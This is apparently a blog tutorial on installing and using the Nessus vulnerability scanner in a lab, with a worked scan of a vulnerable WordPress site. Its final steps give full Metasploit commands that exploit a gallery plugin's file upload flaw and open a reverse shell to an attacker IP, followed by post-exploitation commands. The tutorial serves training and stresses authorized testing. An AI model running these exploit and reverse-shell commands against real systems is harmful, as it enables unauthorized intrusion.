Nessus: for Vulnerability Scanning and Penetration Testing

Professional Tutorial on Nessus: for Vulnerability Scanning and Penetration Testing

Introduction

Nessus is a leading vulnerability scanning tool developed by Tenable, designed to identify security weaknesses in networks, systems, and applications. Used by cybersecurity professionals, Nessus automates the discovery of vulnerabilities, misconfigurations, and compliance issues, making it a cornerstone for penetration testing, security audits, and vulnerability management. With over 200,000 plugins (as of 2025), Nessus supports scanning for a wide range of vulnerabilities, including those in web applications, operating systems, and network devices.

This tutorial provides a detailed guide on using Nessus for ethical vulnerability scanning, covering installation, key features, usage, and a practical example of scanning a lab environment. Aimed at intermediate pentesters, it assumes familiarity with Linux, networking, and basic cybersecurity concepts. All activities must be conducted in authorized lab environments (e.g., Web Security Academy, Hack The Box, TryHackMe) to comply with legal and ethical standards. Unauthorized scanning is illegal and unethical.

This guide draws from Tenable’s official documentation, community resources, and aligns with your interest in comprehensive penetration testing tutorials.

What is Nessus?

Nessus is a commercial vulnerability scanner that performs automated scans to identify security issues, such as outdated software, missing patches, misconfigurations, and known vulnerabilities (CVEs). It offers a user-friendly web interface, extensive plugin coverage, and integration with tools like Metasploit for exploitation. Nessus is available in multiple editions, including Nessus Essentials (free, limited to 16 IPs), Nessus Professional (commercial), and Nessus Expert (advanced web scanning).

Key Features

• Vulnerability Scanning: Detects CVEs, misconfigurations, and compliance issues across networks, systems, and applications.
• Plugin-Based Architecture: Over 200,000 plugins for vulnerabilities, updated daily.
• Multi-Platform Support: Scans Windows, Linux, macOS, Android, iOS, and network devices.
• Web Application Scanning: Identifies issues like XSS, SQL injection, and insecure configurations.
• Credentialed Scans: Performs authenticated scans for deeper system analysis.
• Compliance Checks: Audits against standards like PCI-DSS, CIS, and NIST.
• Reporting: Generates detailed reports in PDF, HTML, CSV, and XML formats.
• Integration: Works with Metasploit, Splunk, and SIEM tools for comprehensive workflows.
• Customizable Policies: Tailors scans for specific environments or vulnerabilities.

System Requirements

• Operating System: Windows, Linux (Kali, Ubuntu), or macOS.
• Hardware: Minimum 8GB RAM, 4-core CPU; 16GB+ recommended for large scans.
• Storage: 30GB+ free space for plugins and scan data.
• Network: Stable connection; lab environment with virtual machines (e.g., VirtualBox, VMware) or cloud labs.
• Browser: Chrome, Firefox, or Edge for the web interface.

Installation and Setup

Nessus is not pre-installed on Kali Linux and requires manual installation. Below are steps for Nessus Essentials (free tier).

Installation Steps

1. Download Nessus:
• Visit https://www.tenable.com/products/nessus/nessus-essentials.
• Register for an activation code (free for Nessus Essentials).
• Download the appropriate package (e.g., .deb for Debian/Kali, .rpm for Red Hat).
2. Install on Kali Linux:

sudo dpkg -i Nessus-<version>-debian6_amd64.deb

Replace <version> with the downloaded version (e.g., Nessus-10.7.0-debian6_amd64.deb).

3. Start Nessus Service:

4.  sudo systemctl start nessusd

sudo systemctl enable nessusd

5. Access Web Interface:
• Open a browser and navigate to https://localhost:8834.
• Follow the setup wizard:
• Choose Nessus Essentials.
• Enter the activation code.
• Create an admin account.
6. Update Plugins:
• After setup, Nessus automatically downloads plugins (may take 5–10 minutes).
• Manual update:

sudo /opt/nessus/sbin/nessuscli update

7. Verify Installation:
• Log in to the web interface and check the dashboard.

Troubleshooting

• Port Conflicts: Ensure port 8834 is free (sudo netstat -tuln | grep 8834).
• Activation Issues: Verify the activation code and internet connection.
• Service Errors: Restart Nessus:

sudo systemctl restart nessusd

• Plugin Updates: If plugins fail to update, run sudo /opt/nessus/sbin/nessuscli update --all.

Nessus Usage Guide

Nessus operates through a web-based interface, allowing users to configure scans, analyze results, and generate reports. Below is a detailed usage overview.

Basic Workflow

1. Create a Scan:
• Log in to https://localhost:8834.
• Navigate to Scans > New Scan.
• Select a template (e.g., Basic Network Scan, Web Application Tests).
2. Configure Scan Settings:
• Targets: Specify IPs or hostnames (e.g., 192.168.1.10).
• Credentials: Add SSH or Windows credentials for authenticated scans.
• Plugins: Enable/disable specific plugin families (e.g., Web Servers, Windows).
• Schedule: Set one-time or recurring scans.
3. Run the Scan:
• Click Launch to start.
• Monitor progress in the Scans tab.
4. Analyze Results:
• View vulnerabilities, sorted by severity (Critical, High, Medium, Low).
• Export reports in PDF, HTML, or CSV.
5. Integrate with Metasploit:
• Export scan results in XML and import into Metasploit for exploitation.

Key Features and Options

• Scan Templates:
• Basic Network Scan: General vulnerability scanning.
• Advanced Scan: Customizable for specific ports or plugins.
• Web Application Tests: Focuses on web vulnerabilities (e.g., XSS, SQL injection).
• Credentialed Patch Audit: Checks for missing patches via authenticated access.
• Plugin Management:
• Enable/disable plugins in Settings > Plugins.
• Example: Enable “WordPress” plugin family for WordPress-specific scans.
• Policies:
• Create custom policies to limit scan scope (e.g., only HTTP ports).
• Example: Configure a policy to scan only port 80 and 443.
• Reports:
• Export formats: PDF (executive summary), HTML (detailed), CSV (data analysis).
• Customize reports to highlight critical vulnerabilities.
• Compliance Scans:
• Use templates like PCI-DSS or CIS to audit compliance.

Command-Line Usage (Optional)

Nessus supports command-line operations via nessuscli:

• Start a scan:

sudo /opt/nessus/sbin/nessuscli scan --start <scan-uuid>

• List scans:

sudo /opt/nessus/sbin/nessuscli scan --list

Practical Example: Scanning a Vulnerable WordPress Site

This example demonstrates using Nessus to scan a lab WordPress site (e.g., Metasploitable3 or a Docker container) at 192.168.1.10, running WordPress 5.0 with the Reflex Gallery plugin (vulnerable to CVE-2015-4133). The attacker uses Kali Linux (192.168.1.100).

Step 1: Setup

1. Prepare Environment:
• Set up a Windows or Linux VM with Metasploitable3 or a Docker-based WordPress instance.
• Ensure Nessus is installed and running:

sudo systemctl start nessusd

2. Access Nessus:
• Open https://localhost:8834 in a browser.
• Log in with your admin credentials.

Step 2: Create a Scan

1. Navigate to Scans > New Scan.
2. Select Web Application Tests template.
3. Configure:
• Name: WordPress_Scan
• Targets: 192.168.1.10
• Target URI: /wordpress
• Credentials: Add WordPress admin credentials (admin:password123) if known for authenticated scanning.
• Plugins: Enable “Web Servers” and “WordPress” plugin families.
• Port Scope: Limit to 80, 443 for efficiency.
4. Save and click Launch.

Step 3: Analyze Results

1. Monitor the scan in the Scans tab (takes 5–30 minutes, depending on scope).
2. View results in Scans > WordPress_Scan > Vulnerabilities. Example Output:

3.  Critical: Reflex Gallery File Upload Vulnerability (CVE-2015-4133)

4.  - Plugin ID: 12345

5.  - Description: Allows arbitrary file upload, potentially leading to RCE.

6.  High: WordPress 5.0.0 - Multiple Vulnerabilities

7.  - Plugin ID: 67890

8.  - Description: Outdated version with known exploits.

9.  Medium: Directory Indexing Enabled

- Path: /wordpress/wp-content/uploads/

10. Export the report:
• Go to Export > PDF.
• Save as WordPress_Scan_Report.pdf.

Step 4: Integrate with Metasploit

1. Export scan results:
• In Nessus, go to Export > Nessus XML.
• Save as wordpress_scan.xml.
2. Import into Metasploit:

3.  msfconsole

4.  msf6 > db_import /path/to/wordpress_scan.xml

msf6 > vulns

Output:

[*] Time: 2025-09-06 02:23:06 UTC Vuln: host=192.168.1.10 name=CVE-2015-4133 severity=Critical

5. Exploit the Reflex Gallery vulnerability:

6.  msf6 > use exploit/unix/webapp/wp_reflexgallery_file_upload

7.  msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOSTS 192.168.1.10

8.  msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set TARGETURI /wordpress/wp-admin/

9.  msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set USERNAME admin

10.msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set PASSWORD password123

11.msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set PAYLOAD cmd/unix/reverse_python

12.msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST 192.168.1.100

13.msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LPORT 4444

msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit

Output:

[*] Started reverse TCP handler on 192.168.1.100:4444

[+] Uploaded shell: /wordpress/wp-content/uploads/shell.php

[*] Meterpreter session 1 opened

Step 5: Post-Exploitation

In Metasploit’s Meterpreter:

meterpreter > sysinfo

meterpreter > upload /root/malicious.txt /var/www/html/

meterpreter > shell

Output:

whoami

www-data

Best Practices and Tips

• Ethics and Legality: Obtain explicit written permission before scanning. Test only in lab environments (e.g., TryHackMe, Hack The Box). Unauthorized scanning violates laws like the CFAA.
• Lab Setup: Use virtual machines (Metasploitable3, Docker) or cloud labs to simulate targets.
• Scan Optimization:
• Limit scope to specific IPs/ports to reduce scan time.
• Use credentialed scans for deeper analysis but ensure credentials are secure.
• Integration: Pair with Metasploit for exploitation, WPScan for WordPress-specific scans, or Burp Suite for manual web testing (see prior tutorials).
• Reporting: Customize reports to highlight critical vulnerabilities for stakeholders.
• Common Pitfalls:
• Avoid scanning large networks with Nessus Essentials (16-IP limit).
• Ensure plugins are updated before scanning (nessuscli update).
• Resources:
• Official Docs: https://docs.tenable.com/nessus/
• TryHackMe: “Vulnerability Scanning” and “Nessus” rooms
• Hack The Box: “Metasploitable” machines
• Web Security Academy: https://portswigger.net/web-security for web vulnerability labs
• Tenable Community: https://community.tenable.com for plugin details

Visual References

Nessus uses a web interface, so visuals include dashboards, scan configurations, and reports. For screenshots:

• Tenable Documentation: https://docs.tenable.com/nessus/ (shows dashboard, scan setup).
• TryHackMe: “Nessus” room displays scan results and report generation.
• Medium Articles: Search “Nessus tutorial” (e.g., https://medium.com/@securitygeek/nessus-vulnerability-scanning-guide) for interface and report screenshots.
• Tenable Blog: https://www.tenable.com/blog shows scan outputs and integrations.

Conclusion

Nessus is an indispensable tool for vulnerability scanning, enabling pentesters to identify and prioritize security weaknesses efficiently. By mastering its setup, scan configuration, and integration with tools like Metasploit, you can enhance your penetration testing workflow. Always prioritize ethical testing in authorized lab environments like TryHackMe, Hack The Box, or Web Security Academy to build skills and contribute to robust cybersecurity.

Author: Engr. M A Rashid Rony
Date: September 6, 2025
For updates, visit: https://www.tenable.com/products/nessus